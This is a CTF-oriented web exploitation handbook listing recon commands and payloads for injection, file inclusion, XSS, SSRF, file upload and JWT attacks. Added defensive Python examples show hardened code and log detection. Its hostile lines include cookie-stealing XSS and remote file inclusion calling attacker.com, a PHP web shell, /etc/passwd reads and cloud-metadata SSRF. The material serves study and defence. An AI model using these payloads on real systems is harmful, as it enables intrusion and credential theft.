
Web Exploitation for CTFs — The Hacker’s Web Arsenal


Web exploitation is the core discipline of most CTF challenges — it’s where logic, code, and creativity collide. This handbook transforms your understanding of web vulnerabilities into tactical precision, equipping you with exploitation techniques, payloads, and real-world methodology for CTFs and penetration testing.


I. 🌐 Core Concepts

| Concept | Description |
| --- | --- |
| Client–Server Model | Browser (client) sends requests → Server responds. |
| HTTP Methods | GET, POST, PUT, DELETE, etc. |
| Status Codes | 200 OK, 403 Forbidden, 404 Not Found, 500 Server Error. |
| Cookies / Sessions | Maintain authentication and state. |
| Input Validation | Key to every web exploit — when it fails, you win. |
| Burp Suite / Intercepting Proxy | Your primary weapon for web traffic analysis. |


II. 🧩 Enumeration & Reconnaissance

1️⃣ Directory Brute-Forcing

ffuf -u http://target/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 50

or:

gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

2️⃣ Parameter Discovery

ffuf -u http://target/index.php?FUZZ=test -w params.txt

3️⃣ Hidden File Discovery

curl -s http://target/.git/config
curl -s http://target/.env

4️⃣ Tech Stack Fingerprinting

whatweb http://target
wappalyzer http://target

III. 💣 Common Vulnerability Classes


🧬 1. Command Injection

Occurs when user input is concatenated into a command string that the server hands to a system shell.

🔍 Test

; id
&& whoami
| cat /etc/passwd

💥 Exploit

curl "http://target/vuln.php?cmd=whoami"

🧠 Bypass Examples

  • Encoded: %26%26whoami

  • Chained: || sleep 5

  • Obfuscated: $(id)
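
The server side of this bug and its fix, as an added example that is not part of the original page: a Python ping endpoint that splices the parameter into a shell string (the same defect as PHP's `system("ping $host")`) next to one that validates the value, decodes the `%26%26`-style encodings before checking, and runs the program with an argument vector and no shell. The ping endpoint, `HOST_RE` and the function names are assumptions for the demo.

```python
import re
import subprocess
from typing import List
from urllib.parse import unquote

# Shell metacharacters: each "Test" payload above (";", "&&", "|", "||", "$(...)")
# relies on the shell seeing one of these inside the spliced-in value.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")

# Allowlist for the one thing a ping endpoint needs: a hostname or IPv4 literal.
# (HOST_RE and the ping endpoint are assumptions for this demo.)
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %26%26 (or %2526%2526) is judged as &&."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_host(user_value: str) -> bool:
    """True only for a plain hostname/IPv4 literal after full decoding."""
    value = decode_fully(user_value)
    if SHELL_META.search(value):
        return False
    return HOST_RE.fullmatch(value) is not None


def ping_command_unsafe(host: str) -> str:
    """Vulnerable pattern: the value is spliced into a string that a shell parses,
    so '; id' becomes a second command and '$(id)' is expanded before ping runs."""
    return f"ping -c 1 {host}"


def ping_argv_safe(host: str) -> List[str]:
    """Hardened pattern: validate first, then pass an argument vector with no shell."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", decode_fully(host)]


def run_ping(host: str) -> int:
    """Run the validated command without a shell; returns ping's exit status."""
    return subprocess.run(ping_argv_safe(host), capture_output=True, timeout=10).returncode
```

The allowlist is the real control; the metacharacter check is there to make the rejection reason visible in logs. Note that a single `unquote()` would pass `x%2526%2526whoami` as harmless, which is why the decoder loops until the value stops changing.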


🧩 2. Local File Inclusion (LFI)

Occurs when a user-controlled path is passed to a file-include function, so files outside the intended directory can be read or included.

🔍 Test

page=../../../../etc/passwd

💥 Exploit

curl "http://target/index.php?page=../../../../etc/passwd"

🧠 Advanced Tricks

  • Null byte: ../../../../etc/passwd%00

  • Log poisoning:

    /var/log/apache2/access.log

    Inject PHP code via User-Agent header and include the log file.


🔓 3. Remote File Inclusion (RFI)

page=http://attacker.com/shell.txt

The attacker hosts the payload (for example a reverse shell) on a server they control; the vulnerable include fetches it and the target executes it.
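
The server-side view of both LFI and RFI, as an added example that is not from the page: `PAGES_DIR`, `ALLOWED_PAGES` and the function names are assumptions for the demo. The unsafe resolver shows where `../../../../etc/passwd` actually ends up; the safe one decodes the parameter, refuses the `%00` trick and any URL scheme, canonicalises the path, confirms it is still under the base directory, and finally requires an allowlisted page name.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumed layout for the demo: templates live here and only these may be included.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_page_unsafe(page: str) -> str:
    """Vulnerable pattern: the parameter is joined straight onto the base path.
    '../../../../etc/passwd' walks out of PAGES_DIR; an include() that takes the
    raw value would also fetch 'http://...' when allow_url_include is on (RFI)."""
    return os.path.normpath(os.path.join(PAGES_DIR, page))


def resolve_page_safe(page: str) -> Optional[str]:
    """Hardened pattern: decode, refuse null bytes and URL schemes, canonicalise,
    confirm the path stayed inside PAGES_DIR, then require an allowlisted file."""
    page = unquote(page)
    if "\x00" in page:
        return None                      # the %00 truncation trick
    if "://" in page or page.startswith("\\\\"):
        return None                      # remote include attempt
    candidate = os.path.normpath(os.path.join(PAGES_DIR, page + ".html"))
    if not candidate.startswith(PAGES_DIR.rstrip("/") + "/"):
        return None                      # traversal escaped the base directory
    allowed_paths = {os.path.join(PAGES_DIR, name + ".html") for name in ALLOWED_PAGES}
    if candidate not in allowed_paths:
        return None                      # defence in depth: only known pages
    return candidate
```

`os.path.normpath` is used so the demo runs without the directory existing; on a real server resolve the base directory with `os.path.realpath` once at startup so symlinks inside it cannot point back out.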


💀 4. SQL Injection (SQLi)

🔍 Basic Payloads

' OR 1=1--
' UNION SELECT 1,2,3--

🧰 Exploitation Tools

sqlmap -u "http://target/login.php?id=1" --dump

🧠 Advanced Tricks

  • Bypass filters with comments:

    admin'/**/OR/**/1=1--

  • Blind SQLi:

    1' AND sleep(5)--+

🧩 Manual Blind Testing

time curl -G "http://target/item" --data-urlencode "id=1' AND sleep(5)-- "
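
Why the payloads above work and what stops them, as an added example that is not part of the original page: a constructed in-memory SQLite `users` table queried once with string formatting (vulnerable) and once with a bound parameter (hardened). SQLite has no `sleep()`, so the time-based case is not reproduced; the `OR 1=1` and `UNION` cases are.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the target's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "alice", "user"), (3, "bob", "user")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """Vulnerable pattern: the value is formatted into the SQL text. The quote in
    ' OR 1=1-- closes the literal, OR 1=1 matches every row and -- drops the rest."""
    sql = f"SELECT id, name FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """Hardened pattern: a bound parameter is sent as data, never parsed as SQL."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


def compare(name: str) -> Tuple[int, int]:
    """Row counts returned by the unsafe and the safe version for the same input."""
    conn = make_db()
    return len(lookup_unsafe(conn, name)), len(lookup_safe(conn, name))
```

With the parameterised query the whole payload is looked up as a literal user name and matches nothing; no amount of comment or whitespace trickery changes that, because the database never tokenises the value as SQL.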

🧬 5. Cross-Site Scripting (XSS)

🔍 Reflected XSS

<script>alert(1)</script>

💥 Persistent XSS

Inject into comment fields, profiles, or stored data.

🧠 Payload Variations

"><svg/onload=alert(1)>
<img src=x onerror=alert(1)>
<script>fetch('http://attacker.com/'+document.cookie)</script>

🚀 Stealth Payloads

<iframe src=javascript:alert(1)>
"><svg/onload=fetch('//attacker/xss?c='+document.cookie)>

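An added example, not from the page, showing what the payloads above do to the page structure and what output encoding changes: the same search input is rendered raw and rendered through `html.escape`, then fed to Python's `HTMLParser` to list the tags and `on*` handlers a browser would actually act on. It also shows that `<img ... onerror>` does nothing inside a quoted attribute until a `">` prefix breaks out, while it fires as-is in text context. The template strings and function names are constructed for the demo.

```python
from html import escape
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed inputs, taken from the payload list above.
ATTR_BREAKOUT = '"><svg/onload=alert(1)>'
IMG_PAYLOAD = "<img src=x onerror=alert(1)>"


def render_unsafe(query: str) -> str:
    """Vulnerable pattern: raw input placed in an attribute value and in text."""
    return f'<input value="{query}"><p>Results for {query}</p>'


def render_safe(query: str) -> str:
    """Hardened pattern: HTML-encode for the output context; quote=True also
    encodes the double quote, which is what keeps the attribute closed."""
    safe = escape(query, quote=True)
    return f'<input value="{safe}"><p>Results for {safe}</p>'


class HandlerFinder(HTMLParser):
    """Records every start tag and every on* attribute a browser would act on."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[Tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower()))


def audit(html: str) -> HandlerFinder:
    """Parse a rendered page the way a browser tokenises it."""
    finder = HandlerFinder()
    finder.feed(html)
    finder.close()
    return finder
```

Encoding is per context: `html.escape` is right for element text and quoted attributes, but a value dropped into a `<script>` block or a URL needs JavaScript or URL encoding instead, which is why the hunting tip later on the page says to look at attributes, JavaScript and URLs separately.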
🧩 6. Cross-Site Request Forgery (CSRF)

Tricks a logged-in user's browser into sending a state-changing request the user did not intend, riding on the cookies the browser attaches automatically.

💣 Example:

<form action="http://target/delete.php" method="POST">
  <input type="hidden" name="user" value="admin">
  <input type="submit">
</form>
<script>document.forms[0].submit()</script>
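
How the forged form above is stopped server-side, as an added example that is not from the page: a synchroniser token stored in the session and required on every state-changing request, plus an Origin check. `SESSIONS`, `handle_delete` and the site URL are constructed for the demo and stand in for a real framework's session store and request object.

```python
import hmac
import secrets
from typing import Dict, Optional

# Constructed server-side session store: session id -> user and CSRF token.
SESSIONS: Dict[str, Dict[str, str]] = {}


def new_session(user: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Embedded by the site in its own forms as a hidden field. A page on another
    origin cannot read it, so the auto-submitting form above cannot include it."""
    return SESSIONS[sid]["csrf"]


def handle_delete(sid: str, form: Dict[str, str], origin: Optional[str], site: str) -> str:
    """Request handler for delete.php; returns the status line it would send."""
    session = SESSIONS.get(sid)
    if session is None:
        return "401 not logged in"
    # Check 1: when the browser sends Origin (it does for cross-site POST), it must be us.
    if origin is not None and origin != site:
        return "403 cross-origin request"
    # Check 2: the token must match the one bound to this session, compared in constant time.
    sent = form.get("csrf", "")
    if not hmac.compare_digest(sent.encode(), session["csrf"].encode()):
        return "403 missing or wrong CSRF token"
    return f"200 deleted user {form.get('user')}"
```

Setting the session cookie with `SameSite=Lax` (or `Strict`) adds a third layer, since the browser then withholds the cookie from the cross-site POST in the first place; the token check remains the one that does not depend on browser behaviour.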

🧩 7. Server-Side Template Injection (SSTI)

🔍 Detect

Try {{7*7}} or ${7*7}; if the response contains 49, the template engine evaluated the expression.

💥 Exploit

{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}

Common Frameworks

| Framework | Syntax |
| --- | --- |
| Jinja2 (Python) | {{ }} |
| Twig (PHP) | {{ }} |
| ERB (Ruby) | <%= %> |


🧩 8. Server-Side Request Forgery (SSRF)

🔍 Test

curl "http://target/fetch?url=http://127.0.0.1:22"

🧠 Exploit

Use SSRF to pivot into internal networks:

curl "http://target/fetch?url=http://169.254.169.254/latest/meta-data/"

🚀 Advanced

Bypass blacklist filters:

127.1
localhost
0x7f000001
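
What a fetch endpoint needs in order to reject the bypass forms above, as an added example that is not from the page: `socket.inet_aton` canonicalises the unusual IPv4 literals (`127.1`, `0x7f000001`, and going one step beyond the list, the plain decimal form) exactly as the C library does, names are resolved and every returned address is checked with `ipaddress`, only `http`/`https` are allowed, and a resolution failure fails closed. The function names are assumptions; `8.8.8.8` appears only as a known public address for the positive case.

```python
import ipaddress
import socket
from typing import List, Optional, Union
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def canonical_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Parse the looser IPv4 literal forms the C library accepts (127.1,
    0x7f000001, 2130706433) into a normal address; None if not a literal.
    A blacklist of spellings misses these; comparing addresses does not."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def resolve_all(host: str) -> List[IPAddress]:
    """Every address a host resolves to; empty list on failure (fail closed)."""
    literal = canonical_ipv4(host)
    if literal is not None:
        return [literal]
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def is_safe_fetch_url(url: str) -> bool:
    """True only for http(s) URLs whose host resolves solely to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    addrs = resolve_all(parts.hostname)
    if not addrs:
        return False
    for ip in addrs:
        if ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_multicast:
            return False                 # 127/8, 169.254/16 (cloud metadata), RFC 1918 ...
        if not ip.is_global:
            return False                 # everything else IANA marks special-purpose
    return True
```

Two caveats a real implementation must cover: the fetch has to connect to the address that was validated (otherwise a DNS answer that changes between check and use, or a short TTL, reopens the hole), and HTTP redirects from the fetched resource must be re-validated rather than followed blindly.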

💾 9. File Upload Vulnerabilities

🔍 Test Upload

Try uploading .php, .phtml, .jpg.php.

💥 Exploit Example

<?php system($_GET['cmd']); ?>

Upload, then access:

http://target/uploads/shell.php?cmd=id

🧠 Bypasses

  • Double extensions: file.jpg.php

  • MIME spoofing: Content-Type: image/jpeg

  • Null-byte truncation: file.php%00.jpg
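
An added example, not from the page: an upload validator that closes each of the three bypasses listed (the last extension decides, the magic bytes must match the declared type rather than trusting Content-Type, null bytes are rejected) and never stores the file under the client's name. The allowed types and the function name are assumptions for the demo.

```python
import os
import secrets
from typing import Optional
from urllib.parse import unquote

# Assumed allowlist for an image upload: extension -> (magic bytes, expected MIME type).
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff", "image/jpeg"),
    ".jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    ".png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".gif": (b"GIF8", "image/gif"),
}


def validate_upload(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Return a safe server-side file name, or None if the upload is rejected."""
    name = unquote(filename)
    if "\x00" in name:
        return None                                   # file.php%00.jpg truncation trick
    name = os.path.basename(name.replace("\\", "/"))  # drop any client-supplied path
    ext = os.path.splitext(name)[1].lower()           # LAST extension: file.jpg.php -> .php
    if ext not in ALLOWED:
        return None                                   # .php, .phtml and friends never match
    magic, expected_type = ALLOWED[ext]
    if content_type != expected_type:
        return None                                   # header must agree with the extension
    if not data.startswith(magic):
        return None                                   # Content-Type alone is spoofable
    if b"<?php" in data or b"<?=" in data:
        return None                                   # valid image header with code appended
    return secrets.token_hex(16) + ext                # random name, extension from allowlist
```

Store the result outside the web root (or in a location the web server is configured never to execute scripts from) and serve it through a handler that sets the content type from the allowlist; then even a validator miss cannot become `uploads/shell.php?cmd=id`.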


🧠 10. Authentication & Session Issues

Brute Force

hydra -l admin -P rockyou.txt target http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"

Session Prediction

Check for sequential cookies or JWT tampering:

import jwt  # PyJWT

token = "<paste the session JWT here>"
# Decode without checking the signature, just to inspect the claims
print(jwt.decode(token, options={"verify_signature": False}))
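
The decode-without-verify snippet above shows the claims, not whether they are genuine. As an added example that is not from the page (standard library only, no PyJWT), here is what the server's side of the check must do: recompute the HS256 MAC over the header and payload, pin the algorithm so a switched `alg` header is refused, and compare in constant time. The key and claims are constructed, and `tamper()` exists only to show that a verifying server rejects what `decode_unverified()` happily returns.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint a token as the server would (demo helper; key and claims are constructed)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def decode_unverified(token: str) -> dict:
    """What the PyJWT snippet above returns: the claims exactly as the client
    presented them. Useful for inspection, never for an authorisation decision."""
    return json.loads(b64url_decode(token.split(".")[1]))


def tamper(token: str, **changes) -> str:
    """Re-encode the payload with changed claims but keep the old signature."""
    header, body, sig = token.split(".")
    claims = json.loads(b64url_decode(body))
    claims.update(changes)
    return f"{header}.{b64url(json.dumps(claims, separators=(',', ':')).encode())}.{sig}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Server-side check: exactly three parts, algorithm pinned to HS256 (so an
    alg=none or RS256-swapped header is refused), MAC recomputed and compared in
    constant time. Returns the claims, or None when anything does not add up."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:          # wrong part count, bad base64, bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(b64url_decode(body_b64))
```

When using a library instead, the equivalent of the algorithm pin is passing an explicit `algorithms=["HS256"]` list to `jwt.decode` with signature verification left on; the token's own header must never choose the algorithm.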

IV. 🧠 Exploitation Workflow Example

# Step 1: Recon
whatweb target.com
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Step 2: Identify Input Points
wfuzz -u http://target.com/page.php?FUZZ=value -w params.txt

# Step 3: Test for Injection
curl "http://target.com/page.php?id=1'--+"

# Step 4: Exploit
sqlmap -u "http://target.com/page.php?id=1" --dump

# Step 5: Post-Exploitation
curl "http://target.com/shell.php?cmd=whoami"
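
The same five-step workflow seen from the defender's side, as an added example that is not from the page: constructed Apache/nginx combined-format log lines mirror each step (scanner user-agents, the quote probe, the time-based payload, the traversal, the metadata fetch, the web shell call), and a small parser with per-technique signatures turns them into a per-IP triage count. The signatures, sample lines and function names are all constructed for the demo; the detection logic is not something the page's tools do.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed combined-format lines mirroring the workflow above (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /admin HTTP/1.1" 404 0 "-" "gobuster/3.6"
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /backup HTTP/1.1" 404 0 "-" "gobuster/3.6"
203.0.113.7 - - [01/Jan/2025:10:00:05 +0000] "GET /page.php?id=1%27--+ HTTP/1.1" 500 80 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2025:10:00:09 +0000] "GET /page.php?id=1%27%20AND%20sleep(5)--%20 HTTP/1.1" 200 80 "-" "sqlmap/1.7"
203.0.113.7 - - [01/Jan/2025:10:00:15 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2025:10:00:20 +0000] "GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 300 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2025:10:00:25 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 10 "-" "curl/8.0"
198.51.100.2 - - [01/Jan/2025:10:01:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One defensive signature per technique on this page; tuned for readability, not recall.
SIGNATURES = {
    "sqli": re.compile(r"(?i)('\s*(or|and)\b|union\s+select|sleep\s*\(|--\s*$|--\+)"),
    "lfi": re.compile(r"(\.\./|\.\.\\|/etc/passwd|/proc/self/environ)"),
    "ssrf": re.compile(r"(?i)(169\.254\.169\.254|127\.0\.0\.1|localhost)"),
    "xss": re.compile(r"(?i)(<script|onerror\s*=|onload\s*=|javascript:)"),
    "cmdi": re.compile(r"(?i)[?&]cmd="),
    "webshell": re.compile(r"(?i)/shell\.php"),
    "scanner-ua": re.compile(r"(?i)(gobuster|ffuf|wfuzz|sqlmap|hydra|dirsearch|nikto)"),
}


def parse_line(line: str) -> Dict[str, str]:
    """Fields of one combined-format line, or an empty dict if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}


def classify(entry: Dict[str, str]) -> List[str]:
    """Tags for one request. The path is URL-decoded first, so %27 counts as a quote."""
    path = unquote_plus(entry["path"])
    hits = [name for name, rx in SIGNATURES.items() if name != "scanner-ua" and rx.search(path)]
    if SIGNATURES["scanner-ua"].search(entry["ua"]):
        hits.append("scanner-ua")
    return hits


def triage(log_text: str) -> Dict[str, Counter]:
    """Per-source-IP counts of each tag: the shape you would alert or block on."""
    report: Dict[str, Counter] = defaultdict(Counter)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        for tag in classify(entry):
            report[entry["ip"]][tag] += 1
    return dict(report)
```

The decode-before-match step matters most: the request line stores `1%27--+`, and a signature written against the raw path would miss the quote entirely. A real deployment would add response size and timing (the blind `sleep(5)` request is one that took about five seconds longer than its neighbours) and the 401/failed-login rate per IP that a `hydra` run produces.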

V. 🧩 Useful Tools

| Tool | Description |
| --- | --- |
| Burp Suite | HTTP interception, fuzzing, repeater, collaborator |
| WFuzz / FFUF | Parameter, directory, and fuzzing attacks |
| SQLMap | SQL injection exploitation |
| XSStrike / Dalfox | XSS discovery and exploitation |
| Commix | Command injection exploitation |
| UploadScanner | File upload testing automation |
| WhatWeb / Wappalyzer | Web technology fingerprinting |
| Dirsearch / Gobuster | Directory brute-forcing |


VI. 🧠 Pro Tips & Red Team Tricks

Methodology

  1. Enumerate endpoints → Identify parameters

  2. Check for input reflections and responses

  3. Automate with tools, validate manually

  4. Use Burp Intruder for precision fuzzing

XSS Hunting

  • Use <img src=x onerror=alert(1)> instead of <script>.

  • Look for input in HTML attributes, JavaScript, and URLs.

SQLi Optimization

  • Always test sleep(5) to detect blind SQLi.

  • Dump tables manually if sqlmap fails.

LFI / RFI

  • Chain LFI → RCE using log poisoning or /proc/self/environ.

SSRF

  • Target cloud metadata (169.254.169.254) or internal admin panels.

Automation Tip: use your own one-liners:

while read -r url; do
    curl -s "$url" | grep -iE "error|warning|syntax"
done < urls.txt

VII. ⚔️ Bonus: Universal Web Exploitation Template

#!/bin/bash
# Web Exploitation Template - CTF Automation
target="${1:?usage: $0 <target-host>}"
echo "[+] Scanning: $target"

# Directory brute force
ffuf -u "http://$target/FUZZ" -w /usr/share/wordlists/dirb/common.txt -t 50

# Parameter discovery
ffuf -u "http://$target/index.php?FUZZ=test" -w /usr/share/wordlists/params.txt

# SQLi test (database error text in the response)
curl -s "http://$target/page.php?id=1'" | grep -i "sql"

# XSS test (is the payload reflected unescaped?)
curl -s "http://$target/search?q=<script>alert(1)</script>"
